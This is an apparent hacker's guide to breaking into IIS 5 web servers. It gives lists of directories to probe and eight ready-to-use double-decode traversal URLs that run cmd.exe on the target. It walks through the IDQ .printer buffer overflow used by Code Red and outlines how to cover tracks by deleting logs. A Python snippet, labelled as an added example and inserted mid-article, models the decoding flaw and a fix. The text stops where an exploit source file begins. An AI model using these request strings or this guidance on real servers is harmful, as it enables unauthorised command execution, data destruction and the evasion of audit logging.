This is not an article for a script kiddie. It's a little late but still applicable today, very applicable. This article is intended to be a robust guide for hacking, and administering, IIS 5 servers. So without further ado, The Ultimate IIS Guide.

Outline:
I. Introduction
II. Information Gathering
   A. Enumeration
   B. Identify the directory structure
   C. Is it patched or not?
III. Exploits
   A. Double Decode (Superfluous)
   B. IDQ Buffer Overflow
   C. Source Code Disclosure Exploits
      1. Historical Importance
      2. Impact
      3. New Source Code Disclosure Vulnerabilities
   D. WebDAV Exploit
IV. Covering your Tracks
   A. Where are the Logfiles?
   B. Why can't I delete them now!
   C. How I will delete them later.
Foreword

Know your stuff! Remember, by default all actions of yours are logged on IIS 5 and the FTP server; not sure about the SMTP server, but who cares, you can't use VRFY anyway!

Let's say you are hacking a web server, and you know it is IIS 5. If the IIS Server is running it has a virtual root. By default the virtual root is c:\inetpub\wwwroot\. So if you send the request
GET /frick.html HTTP/1.0 
It checks c:\inetpub\wwwroot\ to see if it has a file named frick.html, and if it does, it sends it. Now if you request the default document by way of
GET / HTTP/1.0 
It then looks for the default document, which if left unchanged is c:\inetpub\wwwroot\iisstart.asp. You must manually change the default document to whatever you wish using the IIS Configuration Dialog. If the pages default.asp or default.htm exist it will serve them instead. If both exist it will serve default.asp. This is the default precedence of the sample pages.

The first thing you should check for while gathering info about the server is whether the administrator has preserved the default directory structure and such. A virtual directory is a directory that can be accessed by IIS without the directory actually being in the virtual root. Virtual directories that you should check for first are:
/_vti_bin/
/scripts/
/msadc/
/iissamples/
/_vti_pvt/
/_vti_cnf/
/_private/
"What good does this do?" you might ask. Well, first it gives you a feel for the directory structure of the machine. And second, if they have failed to patch their machine, you might be able to exploit it using one of the techniques I describe in this paper. After checking those first directories, you can check for some common directories on websites that have chosen not to keep the default structure, such as these:

/cgi-bin/ /bin/ /admin/ /config/ /asp/
/cfg/ /exe/ /php/ /perl/ /binary/
/src/ /tar/ /include/ /topics/ /pwd/
/private/ /conf/ /logs/ /log/ /audio/
/sound/ /pvt/ /images/ /public/ /home/
/cpp/ /db/ /data/ /news/
But don't let this list limit you. You must know as much as possible about the system. So use your imagination. Ok? Done using your imagination? Ready for the 31337 stuff? Let's begin.

If the webpage has a default under construction page, it is most likely that the server was installed by accident and that the current user of the computer does not know about it. It has happened many times, at least 5 times with people I know. However, whether or not they installed it by accident, the known vulnerabilities for the default installation are worthless if they used Windows Update, which eradicates at least 10-20 exploits. Also, before you start hacking away at the server you want to do a port scan, if you haven't already, and see if FTP is running; it might come in handy, as we will discuss later.

The first exploits I will discuss are the Double Decode (sometimes called the Superfluous Decode) directory traversal attacks. These are easily exploitable on a default installation of IIS 5.0. Some people think that you must have a myriad of tools to hack. This is a very clean-cut example that proves you can get root armed with only a web browser. To exploit this you must first find a directory with execute permissions. Such directories by default are: scripts, iissamples, msadc, and _vti_bin. In a possible exploit request string you could have "http://55.55.55.55/scripts" & *Exploit String*. I put *Exploit String* there because there are many to choose from, as listed below. (These exploit strings all execute the DOS command dir, which gives a directory listing.)
/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:
/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+c:
/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:
/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:
/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+c:
/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:
/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:
/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:
I am going to stop listing exploit strings to preserve brevity. But the way the exploit works is that IIS checks for "/../../" (dot-slash) attacks before decoding the request string. So it does not notice that after it decodes the URL-encoded string it is in fact allowing a traversal to take place.

Maybe an example will help. Let's decode this string: "/scripts/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\". We know that %35 decodes to 5, so replace all the %35s with 5, which looks like this: "/scripts/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe?/c+dir+c:\". Then it checks to make sure it got all the URL-encoded stuff and it realizes it forgot to decode %5c, which is a \ (also IIS changes /'s to \'s). Thus the final path that IIS is left with is "\scripts\..\..\..\..\winnt\system32\cmd.exe?\c+dir+c:\", which tells IIS to hop down four directories and then to look in c:\winnt\system32\cmd.exe, and since the original directory was scripts and had execute permissions it executes the shell "cmd.exe" and passes the command line parameters behind the ? in the HTTP request. The shell command would look like this: "cmd.exe /c dir c:\".

This exploit is only limited by your imagination. You can copy files, delete them, disable logging and even delete old logs by utilizing this technique. I have heard that you can upload files using it as well, but I haven't been able to do it myself. You can make their floppy drive spin and, if they have a disk in at the time, you can read files off of it easily with a type command! This is possible with a CD-ROM drive too. There is probably a way to eject the CD-ROM but I don't know how. More information on this exploit at the end of the paper.

The next exploit is the exploit used by the Code Red worm to squiggle its way through the Internet. And unless you live in front of your old Commodore 64 with no internet connection (which some of you might, judging from the pictures at neworder) you will no doubt know how effective Code Red was.
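The ordering bug described above, shown as an added example that is not from the original article: a traversal check that runs before the second decode, next to one that decodes to a fixpoint first, run over request paths constructed from the article's strings. The function names and the "check once-decoded, decode again later" model are my assumptions about the flawed ordering, not IIS source.

```python
import urllib.parse

# Constructed sample request paths, modelled on the strings listed in the article.
SAMPLE_PATHS = [
    "/scripts/../../winnt/system32/cmd.exe",                       # plain traversal
    "/scripts/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe",  # %%35c -> %5c -> backslash
    "/scripts/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe",  # %255c -> %5c -> backslash
    "/iissamples/default.asp",                                      # benign
    "/images/logo%20small.gif",                                     # benign, one encoding
]

def full_decode(path, max_rounds=5):
    """Decode until the string stops changing, so nested encodings are resolved."""
    for _ in range(max_rounds):
        decoded = urllib.parse.unquote(path)
        if decoded == path:
            return path
        path = decoded
    return path

def escapes_root(path):
    """True if the path climbs above the virtual root; backslash counts as slash, as in IIS."""
    depth = 0
    for seg in path.replace("\\", "/").split("/"):
        if seg == "..":
            depth -= 1
        elif seg and seg != ".":
            depth += 1
        if depth < 0:
            return True
    return False

def vulnerable_allows(path):
    """Models the flawed ordering (assumed): the traversal check runs on a
    once-decoded path, while the file system path is built later from the fully decoded one."""
    checked_once = urllib.parse.unquote(path)
    return not escapes_root(checked_once)

def hardened_allows(path):
    """Canonicalise first (decode to a fixpoint), then check."""
    return not escapes_root(full_decode(path))

if __name__ == "__main__":
    for p in SAMPLE_PATHS:
        v = "ALLOW" if vulnerable_allows(p) else "BLOCK"
        h = "ALLOW" if hardened_allows(p) else "BLOCK"
        print(f"flawed={v:5} hardened={h:5} {p}")
```

The same fixpoint decode is what a log-review script needs: match traversal on the fully decoded request, not on the raw line.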
The exploit was dubbed the IDQ .Printer Overflow (pronounced I Dee Que (dot) Printer). The exploit was first discovered by www.eeye.com; they released a simple proof of concept. The proof of concept writes a file to the root of any machine that describes how to remedy the vulnerability. The exploit is done by making a request such as
GET /NULL.printer HTTP/1.0
HOST: [420 char Buffer]
At the 420 char mark you have successfully overwritten EIP. Then shove in your shellcode and root it! The following proof of concept was provided by www.eeye.com. Note: I have been unable to get their proof of concept to work and will provide another, and references to others, at the end of this paper.
Begin File iishack2000.c